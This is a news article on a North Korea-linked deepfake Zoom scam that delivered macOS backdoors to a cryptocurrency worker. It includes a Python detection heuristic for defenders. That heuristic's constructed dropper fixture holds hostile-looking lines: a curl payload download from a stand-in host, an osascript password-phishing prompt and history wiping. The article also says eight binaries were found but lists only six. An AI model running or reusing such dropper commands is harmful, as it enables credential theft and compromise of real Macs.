BlueNoroff Deploys Deepfake Zoom Scam Targeting Cryptocurrency Employee with MacOS Backdoor Malware


A North Korea-aligned threat actor, identified as BlueNoroff, has been engaged in an attack targeting an employee within the Web3 sector by orchestrating deceptive Zoom calls featuring deepfakes of company executives. The objective was to manipulate the victim into installing malware on their Apple macOS devices.

Details surrounding the cyber intrusion were disclosed by Huntress, indicating that the victim was associated with a cryptocurrency foundation and had received a message from an external contact via Telegram. This communication included a request to schedule a meeting, where a Calendly link was provided to arrange the discussion.

Upon clicking the Calendly link, the employee was redirected to a fraudulent Zoom domain under the control of the attacker. After several weeks, the employee participated in a Zoom meeting that included deepfake representations of known senior leaders from their organization, along with other external participants.

During the meeting, when the employee indicated an issue with their microphone, the synthetic personas urged them to download a Zoom extension to resolve the problem. The extension, shared through Telegram, led to the installation of an AppleScript named “zoomsdksupport.scpt.” This script initially opened a legitimate webpage for the Zoom software development kit (SDK) while stealthily downloading a secondary payload from a remote server and executing a shell script.

This shell script performed a series of actions, including disabling bash history logging and checking for the presence of Rosetta 2 on the compromised Mac. Should it be absent, the script would install it. Rosetta facilitates the operation of applications designed for Intel-based Macs on Apple silicon devices.

The script subsequently created a hidden file named “.pwd” and downloaded a binary from the malicious Zoom webpage into the “/tmp/icloud_helper” directory. Additionally, it sent out a request for another unspecified payload.

Moreover, the script prompted the user to input their system password and cleared the history of executed commands to eliminate traces of the attack. Investigations by Huntress revealed eight distinct malicious binaries present on the victim’s system:

  • Telegram 2: A Nim-based binary that activates the primary backdoor.
  • Root Troy V4: A comprehensive Go backdoor capable of executing remote AppleScript payloads and shell commands while also downloading and executing additional malware.
  • InjectWithDyld: A C++ binary loader utilized by Root Troy V4 to deploy further payloads, including a benign Swift application for process injection and a separate Nim implant for asynchronous command issuance and response retrieval.
  • XScreen: An Objective-C keylogger designed to capture keystrokes, clipboard activity, and screen content, transmitting the data to a command-and-control (C2) server.
  • CryptoBot: A Go-based information stealer that can extract cryptocurrency-related files from the affected host.
  • NetChk: An almost empty binary that endlessly generates random numbers.
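As an added example (not code from Huntress or from the article), the following Python heuristic scans a shell script for the combination of behaviours the article attributes to the dropper: disabling history logging, installing Rosetta 2, creating the hidden ".pwd" file, writing "/tmp/icloud_helper", prompting for the password, and clearing command history. The regexes and both sample scripts are constructed assumptions; the actual script is not reproduced on the page.

```python
import re

# Detection heuristics for the behaviours the article attributes to the
# dropper shell script. The regexes are ASSUMPTIONS about how each behaviour
# is usually written in bash; the page does not reproduce the actual script.
INDICATORS = {
    "history_disabled": re.compile(
        r"unset\s+HISTFILE|HISTFILE=/dev/null|set\s+\+o\s+history|HISTSIZE=0"),
    "rosetta_install": re.compile(r"softwareupdate\s+--install-rosetta"),
    "hidden_pwd_file": re.compile(r"(^|[\s/])\.pwd\b"),
    "tmp_icloud_helper": re.compile(r"/tmp/icloud_helper"),
    "password_prompt": re.compile(
        r"osascript.*display dialog.*(hidden answer|password)", re.IGNORECASE),
    "history_cleared": re.compile(
        r"history\s+-c|rm\s+(-\w+\s+)?~/\.(bash|zsh)_history"),
}


def scan_shell_script(text: str) -> dict:
    """Return the indicators that fire plus a verdict.

    A single hit is not enough on its own: a Rosetta 2 install is common in
    legitimate developer bootstrap scripts. Two or more independent
    behaviours from the chain described in the article are flagged.
    """
    hits = sorted(name for name, rx in INDICATORS.items() if rx.search(text))
    return {"hits": hits, "verdict": "suspicious" if len(hits) >= 2 else "clean"}


# Constructed fixture modelling the described chain (not the real script).
CONSTRUCTED_DROPPER = r"""#!/bin/bash
unset HISTFILE
pgrep -q oahd || softwareupdate --install-rosetta --agree-to-license
touch ~/.pwd
curl -fsSL https://zoom.example.invalid/helper -o /tmp/icloud_helper
PW=$(osascript -e 'display dialog "Zoom needs your password" with hidden answer')
history -c
"""

# Constructed benign script: the Rosetta install is its only overlap.
CONSTRUCTED_BENIGN = r"""#!/bin/bash
softwareupdate --install-rosetta --agree-to-license
brew install git
"""

if __name__ == "__main__":
    for label, script in (("dropper", CONSTRUCTED_DROPPER), ("benign", CONSTRUCTED_BENIGN)):
        print(label, scan_shell_script(script))
```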

BlueNoroff is also recognized under various aliases, including Alluring Pisces, APT38, and TA444. This subgroup of the Lazarus Group has a notable history of targeting financial institutions, cryptocurrency enterprises, and ATMs, with the aim of generating revenue for the Democratic People’s Republic of Korea (DPRK).

Notably, BlueNoroff is infamous for executing cryptocurrency heists such as “TraderTraitor,” which aimed at employees of organizations involved in blockchain research using malicious cryptocurrency trading applications. Among the significant breaches are the hacks of Bybit and Axie Infinity.

Huntress emphasized the importance of training remote employees in recognizing common social engineering attacks associated with remote meeting software, particularly in high-risk sectors. Recent assessments by DTEX indicated that the APT38 mission has likely fragmented, giving rise to new subgroups like TraderTraitor and CryptoCore, which are becoming the dominant forces in financial theft operations for the regime.

The threat landscape continues to evolve: the tactic of using audio-related lures to deceive victims into compromising their own machines with malware mirrors an earlier campaign named Contagious Interview, which used ClickFix-type alerts to propagate malware called GolangGhost.

The latest iteration, referred to as ClickFake Interview, involves crafting fictitious job postings aimed at job seekers, tricking them into executing malicious commands under the guise of resolving camera and microphone access issues on a fraudulent website created by the attackers.

Cross-platform attacks have advanced to include a Python variant of GolangGhost, known as PylangGhost. These attacks primarily target Windows systems while maintaining a Golang-based version for macOS, with no current targeting of Linux users. PylangGhost communicates with a C2 server for remote control, file management, and credential theft from over 80 browser extensions, including password managers and cryptocurrency wallets.

It remains uncertain why the perpetrators chose to develop two variants in different programming languages, yet the structural similarities suggest close collaboration or a shared developmental resource.